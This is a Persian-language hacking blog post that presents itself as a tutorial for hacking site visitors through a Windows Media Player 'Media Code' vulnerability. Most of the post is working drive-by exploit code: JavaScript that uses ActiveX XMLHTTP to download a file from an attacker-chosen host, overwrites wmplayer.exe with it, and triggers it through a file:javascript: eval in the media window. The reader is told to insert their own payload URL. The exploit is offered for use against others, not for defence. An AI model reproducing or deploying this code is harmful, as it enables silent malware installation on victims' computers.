WwW.GodHacKers.CoM
آرشیو

اخبار

تالار گفتمان
دریافت فایل

بهتیرین فایل

جدید ترین فایل

قدیمی ترین

تعداد دسته ها

تعداد فایل ها

فایل دانلود شده

Master

برای عضویت در خبرنامه این وبلاگ نام کاربری خود در سیستم بلاگ اسکای را وارد کنید
نام کاربری
آرشیو

اخبار

تالار گفتمان
دریافت فایل

بهتیرین فایل

جدید ترین فایل

قدیمی ترین

تعداد دسته ها

تعداد فایل ها

فایل دانلود شده

Master

موضوع بندی
جمعه 27 خرداد‌ماه سال 1384
استفاده از اکسپلویت Media Code, Media Code

استفاده از اکسپلویت Media Code, Media Code

چگونه افراد را از طریق ورود به سایت و از طزیق استفاده از آسیب پذیری مدیا هک کنیم.

ابتدا برنامه Front Page را باز می کنیم و 1 Page بصورت HTML درست می کنیم.

سپس کا را که در کادر مشاهدا می کنید آن رت کپی کرده و در آن Past
می کنیم


________________________________________________________

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.********.com/****.***",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/ /);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"\'");
line = line.replace(/[\]/g,"\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\r\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script>

__________________________________________________________

حال شما آدرس فایل مورد نظر خود را به جای
http://www.Host .com/****.***l 
Past کنید .

موفق باشید

نوشته شده توسط : نادر نصیری ( Master )
حق کپی رایت از سایت : www.PersianHacKer.Org

عناوین آخرین یادداشت ها